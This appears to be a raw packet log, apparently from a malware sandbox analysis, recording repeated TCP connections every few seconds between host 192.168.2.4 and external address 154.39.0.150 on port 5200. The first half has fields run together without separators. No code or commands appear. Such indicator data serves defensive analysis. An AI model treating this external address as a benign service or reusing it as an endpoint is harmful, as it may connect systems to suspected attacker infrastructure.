                                                                Dec 31, 2024 13:29:24.835388899 CET520049746154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:29:24.835464954 CET497465200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:29:24.852735043 CET497465200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:29:24.857487917 CET520049746154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:29:26.234813929 CET520049746154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:29:26.235542059 CET497465200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:29:28.673146009 CET497465200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:29:28.673784018 CET497475200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:29:28.678060055 CET520049746154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:29:28.678577900 CET520049747154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:29:28.678641081 CET497475200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:29:28.694659948 CET497475200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:29:28.699500084 CET520049747154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:29:30.063697100 CET520049747154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:29:30.063885927 CET497475200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:29:33.683151960 CET497475200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:29:33.686044931 CET497485200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:29:33.688074112 CET520049747154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:29:33.690879107 CET520049748154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:29:33.690948009 CET497485200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:29:33.713171959 CET497485200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:29:33.717957020 CET520049748154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:29:35.098970890 CET520049748154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:29:35.099884987 CET497485200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:29:37.923238993 CET497485200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:29:37.924045086 CET497495200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:29:37.928172112 CET520049748154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:29:37.928872108 CET520049749154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:29:37.928944111 CET497495200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:29:37.946120977 CET497495200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:29:37.950901031 CET520049749154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:29:39.330873966 CET520049749154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:29:39.330945969 CET497495200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:29:42.115588903 CET497495200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:29:42.119801044 CET497505200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:29:42.120460033 CET520049749154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:29:42.124685049 CET520049750154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:29:42.124744892 CET497505200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:29:42.154865026 CET497505200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:29:42.159720898 CET520049750154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:29:43.516941071 CET520049750154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:29:43.517010927 CET497505200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:29:46.001319885 CET497505200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:29:46.003473043 CET497515200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:29:46.006329060 CET520049750154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:29:46.008318901 CET520049751154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:29:46.008399963 CET497515200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:29:46.027930021 CET497515200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:29:46.032680988 CET520049751154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:29:47.391501904 CET520049751154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:29:47.391674042 CET497515200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:29:49.142168045 CET497515200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:29:49.142723083 CET497525200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:29:49.147037029 CET520049751154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:29:49.147561073 CET520049752154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:29:49.147636890 CET497525200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:29:49.162734985 CET497525200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:29:49.169151068 CET520049752154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:29:50.532461882 CET520049752154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:29:50.532588005 CET497525200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:29:51.642182112 CET497525200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:29:51.643081903 CET497545200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:29:51.646985054 CET520049752154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:29:51.647893906 CET520049754154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:29:51.647974014 CET497545200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:29:51.663372040 CET497545200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:29:51.668126106 CET520049754154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:29:53.049952984 CET520049754154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:29:53.050116062 CET497545200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:29:53.576919079 CET497545200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:29:53.578444958 CET497555200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:29:53.581809044 CET520049754154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:29:53.583241940 CET520049755154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:29:53.583338022 CET497555200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:29:53.681211948 CET497555200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:29:53.686052084 CET520049755154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:29:54.969397068 CET520049755154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:29:54.969460964 CET497555200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:29:55.141899109 CET497555200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:29:55.142577887 CET497625200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:29:55.148124933 CET520049755154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:29:55.148669958 CET520049762154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:29:55.148727894 CET497625200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:29:55.164473057 CET497625200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:29:55.170591116 CET520049762154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:29:56.550066948 CET520049762154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:29:56.551928043 CET497625200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:29:57.032525063 CET497625200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:29:57.034580946 CET497735200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:29:57.037405968 CET520049762154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:29:57.039426088 CET520049773154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:29:57.039500952 CET497735200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:29:57.061438084 CET497735200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:29:57.066278934 CET520049773154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:29:58.440726042 CET520049773154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:29:58.442018032 CET497735200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:29:58.516910076 CET497735200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:29:58.517697096 CET497845200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:29:58.521729946 CET520049773154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:29:58.522536039 CET520049784154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:29:58.522645950 CET497845200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:29:58.538804054 CET497845200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:29:58.543697119 CET520049784154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:29:59.907972097 CET520049784154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:29:59.908036947 CET497845200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:30:00.439574003 CET497845200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:30:00.440999985 CET497945200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:30:00.444360018 CET520049784154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:30:00.445817947 CET520049794154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:30:00.445898056 CET497945200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:30:00.470644951 CET497945200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:30:00.475399017 CET520049794154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:30:01.846169949 CET520049794154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:30:01.847753048 CET497945200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:30:01.848118067 CET497945200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:30:01.852888107 CET520049794154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:30:01.892812967 CET498025200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:30:01.897692919 CET520049802154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:30:01.897754908 CET498025200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:30:02.184545040 CET498025200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:30:02.189393044 CET520049802154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:30:03.321949959 CET520049802154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:30:03.322030067 CET498025200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:30:03.360750914 CET498025200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:30:03.361423016 CET498135200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:30:03.365519047 CET520049802154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:30:03.366247892 CET520049813154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:30:03.366309881 CET498135200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:30:03.381055117 CET498135200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:30:03.385895967 CET520049813154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:30:04.799124956 CET520049813154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:30:04.799180984 CET498135200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:30:04.813853025 CET498135200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:30:04.814670086 CET498245200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:30:04.818675041 CET520049813154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:30:04.819468021 CET520049824154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:30:04.819536924 CET498245200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:30:04.837836027 CET498245200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:30:04.842681885 CET520049824154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:30:06.300113916 CET520049824154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:30:06.304009914 CET498245200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:30:06.305067062 CET498245200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:30:06.308068037 CET498345200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:30:06.309789896 CET520049824154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:30:06.312845945 CET520049834154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:30:06.315577030 CET498345200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:30:06.330415010 CET498345200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:30:06.335227966 CET520049834154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:30:07.725989103 CET520049834154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:30:07.726037025 CET498345200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:30:07.726253033 CET498345200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:30:07.728737116 CET498435200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:30:07.731041908 CET520049834154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:30:07.733567953 CET520049843154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:30:07.733622074 CET498435200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:30:07.772257090 CET498435200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:30:07.777050972 CET520049843154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:30:09.126854897 CET520049843154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:30:09.126935959 CET498435200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:30:12.877223969 CET498435200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:30:12.878680944 CET498775200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:30:12.882050037 CET520049843154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:30:12.883445978 CET520049877154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:30:12.883614063 CET498775200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:30:12.943658113 CET498775200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:30:12.948481083 CET520049877154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:30:14.298630953 CET520049877154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:30:14.298685074 CET498775200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:30:18.001419067 CET498775200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:30:18.004338026 CET499135200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:30:18.006206989 CET520049877154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:30:18.009205103 CET520049913154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:30:18.009262085 CET499135200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:30:18.078274012 CET499135200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:30:18.083069086 CET520049913154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:30:19.411808968 CET520049913154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:30:19.411906004 CET499135200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:30:23.728007078 CET499135200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:30:23.732247114 CET499495200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:30:23.732798100 CET520049913154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:30:23.737103939 CET520049949154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:30:23.737183094 CET499495200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:30:23.886331081 CET499495200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:30:23.891077042 CET520049949154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:30:24.159842014 CET499495200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:30:24.164608955 CET520049949154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:30:24.173409939 CET499495200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:30:24.178201914 CET520049949154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:30:24.251471043 CET499495200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:30:24.256364107 CET520049949154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:30:24.267052889 CET499495200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:30:24.271816969 CET520049949154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:30:24.298311949 CET499495200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:30:24.303081036 CET520049949154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:30:25.126791000 CET520049949154.39.0.150192.168.2.4
                                                                Dec 31, 2024 13:30:25.126920938 CET499495200192.168.2.4154.39.0.150
                                                                Dec 31, 2024 13:30:29.595143080 CET499495200192.168.2.4154.39.0.150
Dec 31, 2024 13:30:29.596699953 CET  192.168.2.4:49990 -> 154.39.0.150:5200
Dec 31, 2024 13:30:29.600025892 CET  154.39.0.150:5200 -> 192.168.2.4:49949
Dec 31, 2024 13:30:29.601552963 CET  154.39.0.150:5200 -> 192.168.2.4:49990
Dec 31, 2024 13:30:29.604067087 CET  192.168.2.4:49990 -> 154.39.0.150:5200
Dec 31, 2024 13:30:29.671291113 CET  192.168.2.4:49990 -> 154.39.0.150:5200
Dec 31, 2024 13:30:29.676029921 CET  154.39.0.150:5200 -> 192.168.2.4:49990
Dec 31, 2024 13:30:29.704792976 CET  192.168.2.4:49990 -> 154.39.0.150:5200
Dec 31, 2024 13:30:29.709564924 CET  154.39.0.150:5200 -> 192.168.2.4:49990
Dec 31, 2024 13:30:29.751724005 CET  192.168.2.4:49990 -> 154.39.0.150:5200
Dec 31, 2024 13:30:29.756479979 CET  154.39.0.150:5200 -> 192.168.2.4:49990
Dec 31, 2024 13:30:29.767165899 CET  192.168.2.4:49990 -> 154.39.0.150:5200
Dec 31, 2024 13:30:29.771908045 CET  154.39.0.150:5200 -> 192.168.2.4:49990
Dec 31, 2024 13:30:29.782809019 CET  192.168.2.4:49990 -> 154.39.0.150:5200
Dec 31, 2024 13:30:29.787558079 CET  154.39.0.150:5200 -> 192.168.2.4:49990
Dec 31, 2024 13:30:29.814048052 CET  192.168.2.4:49990 -> 154.39.0.150:5200
Dec 31, 2024 13:30:29.818866014 CET  154.39.0.150:5200 -> 192.168.2.4:49990
Dec 31, 2024 13:30:29.861629963 CET  192.168.2.4:49990 -> 154.39.0.150:5200
Dec 31, 2024 13:30:29.866430998 CET  154.39.0.150:5200 -> 192.168.2.4:49990
Dec 31, 2024 13:30:31.023103952 CET  154.39.0.150:5200 -> 192.168.2.4:49990
Dec 31, 2024 13:30:31.023232937 CET  192.168.2.4:49990 -> 154.39.0.150:5200
Dec 31, 2024 13:30:34.877964020 CET  192.168.2.4:49990 -> 154.39.0.150:5200
Dec 31, 2024 13:30:34.878115892 CET  192.168.2.4:50026 -> 154.39.0.150:5200
Dec 31, 2024 13:30:34.882760048 CET  154.39.0.150:5200 -> 192.168.2.4:49990
Dec 31, 2024 13:30:34.882872105 CET  154.39.0.150:5200 -> 192.168.2.4:50026
Dec 31, 2024 13:30:34.883009911 CET  192.168.2.4:50026 -> 154.39.0.150:5200
Dec 31, 2024 13:30:35.052146912 CET  192.168.2.4:50026 -> 154.39.0.150:5200
Dec 31, 2024 13:30:35.057014942 CET  154.39.0.150:5200 -> 192.168.2.4:50026
Dec 31, 2024 13:30:36.284923077 CET  154.39.0.150:5200 -> 192.168.2.4:50026
Dec 31, 2024 13:30:36.284970045 CET  192.168.2.4:50026 -> 154.39.0.150:5200
Dec 31, 2024 13:30:40.563883066 CET  192.168.2.4:50026 -> 154.39.0.150:5200
Dec 31, 2024 13:30:40.565753937 CET  192.168.2.4:50036 -> 154.39.0.150:5200
Dec 31, 2024 13:30:40.568701029 CET  154.39.0.150:5200 -> 192.168.2.4:50026
Dec 31, 2024 13:30:40.570532084 CET  154.39.0.150:5200 -> 192.168.2.4:50036
Dec 31, 2024 13:30:40.570602894 CET  192.168.2.4:50036 -> 154.39.0.150:5200
Dec 31, 2024 13:30:40.627222061 CET  192.168.2.4:50036 -> 154.39.0.150:5200
Dec 31, 2024 13:30:40.634815931 CET  154.39.0.150:5200 -> 192.168.2.4:50036
Dec 31, 2024 13:30:42.047481060 CET  154.39.0.150:5200 -> 192.168.2.4:50036
Dec 31, 2024 13:30:42.047621012 CET  192.168.2.4:50036 -> 154.39.0.150:5200
Dec 31, 2024 13:30:45.782778025 CET  192.168.2.4:50036 -> 154.39.0.150:5200
Dec 31, 2024 13:30:45.786226988 CET  192.168.2.4:50037 -> 154.39.0.150:5200
Dec 31, 2024 13:30:45.787715912 CET  154.39.0.150:5200 -> 192.168.2.4:50036
Dec 31, 2024 13:30:45.791042089 CET  154.39.0.150:5200 -> 192.168.2.4:50037
Dec 31, 2024 13:30:45.791101933 CET  192.168.2.4:50037 -> 154.39.0.150:5200
Dec 31, 2024 13:30:45.827205896 CET  192.168.2.4:50037 -> 154.39.0.150:5200
Dec 31, 2024 13:30:45.832098961 CET  154.39.0.150:5200 -> 192.168.2.4:50037
Dec 31, 2024 13:30:45.892165899 CET  192.168.2.4:50037 -> 154.39.0.150:5200
Dec 31, 2024 13:30:45.897000074 CET  154.39.0.150:5200 -> 192.168.2.4:50037
Dec 31, 2024 13:30:45.939254999 CET  192.168.2.4:50037 -> 154.39.0.150:5200
Dec 31, 2024 13:30:45.944159031 CET  154.39.0.150:5200 -> 192.168.2.4:50037
Dec 31, 2024 13:30:45.954864025 CET  192.168.2.4:50037 -> 154.39.0.150:5200
Dec 31, 2024 13:30:45.959661007 CET  154.39.0.150:5200 -> 192.168.2.4:50037
Dec 31, 2024 13:30:45.986040115 CET  192.168.2.4:50037 -> 154.39.0.150:5200
Dec 31, 2024 13:30:45.990856886 CET  154.39.0.150:5200 -> 192.168.2.4:50037
Dec 31, 2024 13:30:46.017297983 CET  192.168.2.4:50037 -> 154.39.0.150:5200
Dec 31, 2024 13:30:46.022077084 CET  154.39.0.150:5200 -> 192.168.2.4:50037
Dec 31, 2024 13:30:46.079869986 CET  192.168.2.4:50037 -> 154.39.0.150:5200
Dec 31, 2024 13:30:46.084724903 CET  154.39.0.150:5200 -> 192.168.2.4:50037
Dec 31, 2024 13:30:46.220416069 CET  192.168.2.4:50037 -> 154.39.0.150:5200
Dec 31, 2024 13:30:46.225316048 CET  154.39.0.150:5200 -> 192.168.2.4:50037
Dec 31, 2024 13:30:47.184191942 CET  154.39.0.150:5200 -> 192.168.2.4:50037
Dec 31, 2024 13:30:47.184266090 CET  192.168.2.4:50037 -> 154.39.0.150:5200
Dec 31, 2024 13:30:51.298229933 CET  192.168.2.4:50037 -> 154.39.0.150:5200
Dec 31, 2024 13:30:51.299731016 CET  192.168.2.4:50038 -> 154.39.0.150:5200
Dec 31, 2024 13:30:51.303086042 CET  154.39.0.150:5200 -> 192.168.2.4:50037
Dec 31, 2024 13:30:51.304510117 CET  154.39.0.150:5200 -> 192.168.2.4:50038
Dec 31, 2024 13:30:51.308012962 CET  192.168.2.4:50038 -> 154.39.0.150:5200
Dec 31, 2024 13:30:51.338963032 CET  192.168.2.4:50038 -> 154.39.0.150:5200
Dec 31, 2024 13:30:51.343776941 CET  154.39.0.150:5200 -> 192.168.2.4:50038
Dec 31, 2024 13:30:51.564116001 CET  192.168.2.4:50038 -> 154.39.0.150:5200
Dec 31, 2024 13:30:51.569042921 CET  154.39.0.150:5200 -> 192.168.2.4:50038
Dec 31, 2024 13:30:51.579701900 CET  192.168.2.4:50038 -> 154.39.0.150:5200
Dec 31, 2024 13:30:51.584597111 CET  154.39.0.150:5200 -> 192.168.2.4:50038
Dec 31, 2024 13:30:51.595362902 CET  192.168.2.4:50038 -> 154.39.0.150:5200
Dec 31, 2024 13:30:51.600138903 CET  154.39.0.150:5200 -> 192.168.2.4:50038
Dec 31, 2024 13:30:52.726840019 CET  154.39.0.150:5200 -> 192.168.2.4:50038
Dec 31, 2024 13:30:52.726916075 CET  192.168.2.4:50038 -> 154.39.0.150:5200
Dec 31, 2024 13:30:56.610836983 CET  192.168.2.4:50038 -> 154.39.0.150:5200
Dec 31, 2024 13:30:56.613050938 CET  192.168.2.4:50039 -> 154.39.0.150:5200
Dec 31, 2024 13:30:56.615710020 CET  154.39.0.150:5200 -> 192.168.2.4:50038
Dec 31, 2024 13:30:56.617835999 CET  154.39.0.150:5200 -> 192.168.2.4:50039
Dec 31, 2024 13:30:56.617904902 CET  192.168.2.4:50039 -> 154.39.0.150:5200
Dec 31, 2024 13:30:56.756922007 CET  192.168.2.4:50039 -> 154.39.0.150:5200
Dec 31, 2024 13:30:56.761729956 CET  154.39.0.150:5200 -> 192.168.2.4:50039
Dec 31, 2024 13:30:58.022635937 CET  154.39.0.150:5200 -> 192.168.2.4:50039
Dec 31, 2024 13:30:58.028081894 CET  192.168.2.4:50039 -> 154.39.0.150:5200
Dec 31, 2024 13:31:02.174640894 CET  192.168.2.4:50039 -> 154.39.0.150:5200
Dec 31, 2024 13:31:02.176213026 CET  192.168.2.4:50040 -> 154.39.0.150:5200
Dec 31, 2024 13:31:02.179516077 CET  154.39.0.150:5200 -> 192.168.2.4:50039
Dec 31, 2024 13:31:02.181034088 CET  154.39.0.150:5200 -> 192.168.2.4:50040
Dec 31, 2024 13:31:02.181143999 CET  192.168.2.4:50040 -> 154.39.0.150:5200
Dec 31, 2024 13:31:02.238675117 CET  192.168.2.4:50040 -> 154.39.0.150:5200
Dec 31, 2024 13:31:02.243455887 CET  154.39.0.150:5200 -> 192.168.2.4:50040
Dec 31, 2024 13:31:03.627599001 CET  154.39.0.150:5200 -> 192.168.2.4:50040
Dec 31, 2024 13:31:03.627681971 CET  192.168.2.4:50040 -> 154.39.0.150:5200
Dec 31, 2024 13:31:07.346652031 CET  192.168.2.4:50040 -> 154.39.0.150:5200
Dec 31, 2024 13:31:07.350171089 CET  192.168.2.4:50041 -> 154.39.0.150:5200
Dec 31, 2024 13:31:07.351547956 CET  154.39.0.150:5200 -> 192.168.2.4:50040
Dec 31, 2024 13:31:07.355062008 CET  154.39.0.150:5200 -> 192.168.2.4:50041
Dec 31, 2024 13:31:07.355124950 CET  192.168.2.4:50041 -> 154.39.0.150:5200
Dec 31, 2024 13:31:07.609247923 CET  192.168.2.4:50041 -> 154.39.0.150:5200
Dec 31, 2024 13:31:07.628182888 CET  154.39.0.150:5200 -> 192.168.2.4:50041
Dec 31, 2024 13:31:08.736834049 CET  154.39.0.150:5200 -> 192.168.2.4:50041
Dec 31, 2024 13:31:08.736887932 CET  192.168.2.4:50041 -> 154.39.0.150:5200
Dec 31, 2024 13:31:12.861054897 CET  192.168.2.4:50041 -> 154.39.0.150:5200
Dec 31, 2024 13:31:12.864022017 CET  192.168.2.4:50042 -> 154.39.0.150:5200
Dec 31, 2024 13:31:12.865941048 CET  154.39.0.150:5200 -> 192.168.2.4:50041
Dec 31, 2024 13:31:12.868787050 CET  154.39.0.150:5200 -> 192.168.2.4:50042
Dec 31, 2024 13:31:12.868844032 CET  192.168.2.4:50042 -> 154.39.0.150:5200
Dec 31, 2024 13:31:12.903830051 CET  192.168.2.4:50042 -> 154.39.0.150:5200
Dec 31, 2024 13:31:12.908551931 CET  154.39.0.150:5200 -> 192.168.2.4:50042
Dec 31, 2024 13:31:13.251740932 CET  192.168.2.4:50042 -> 154.39.0.150:5200
Dec 31, 2024 13:31:13.256674051 CET  154.39.0.150:5200 -> 192.168.2.4:50042
Dec 31, 2024 13:31:13.267177105 CET  192.168.2.4:50042 -> 154.39.0.150:5200
Dec 31, 2024 13:31:13.271912098 CET  154.39.0.150:5200 -> 192.168.2.4:50042
Dec 31, 2024 13:31:14.252897024 CET  154.39.0.150:5200 -> 192.168.2.4:50042
Dec 31, 2024 13:31:14.253123999 CET  192.168.2.4:50042 -> 154.39.0.150:5200
Dec 31, 2024 13:31:18.283067942 CET  192.168.2.4:50042 -> 154.39.0.150:5200
Dec 31, 2024 13:31:18.287975073 CET  154.39.0.150:5200 -> 192.168.2.4:50042
Dec 31, 2024 13:31:18.290741920 CET  192.168.2.4:50043 -> 154.39.0.150:5200
Dec 31, 2024 13:31:18.295536995 CET  154.39.0.150:5200 -> 192.168.2.4:50043
Dec 31, 2024 13:31:18.295667887 CET  192.168.2.4:50043 -> 154.39.0.150:5200
Dec 31, 2024 13:31:18.584562063 CET  192.168.2.4:50043 -> 154.39.0.150:5200
Dec 31, 2024 13:31:18.589363098 CET  154.39.0.150:5200 -> 192.168.2.4:50043
Dec 31, 2024 13:31:19.704948902 CET  192.168.2.4:50043 -> 154.39.0.150:5200
Dec 31, 2024 13:31:19.708197117 CET  154.39.0.150:5200 -> 192.168.2.4:50043
Dec 31, 2024 13:31:19.708250999 CET  192.168.2.4:50043 -> 154.39.0.150:5200
Dec 31, 2024 13:31:19.708396912 CET  192.168.2.4:50043 -> 154.39.0.150:5200
Dec 31, 2024 13:31:19.709059954 CET  192.168.2.4:50044 -> 154.39.0.150:5200
Dec 31, 2024 13:31:19.709742069 CET  154.39.0.150:5200 -> 192.168.2.4:50043
Dec 31, 2024 13:31:19.713037014 CET  154.39.0.150:5200 -> 192.168.2.4:50043
Dec 31, 2024 13:31:19.713130951 CET  154.39.0.150:5200 -> 192.168.2.4:50043
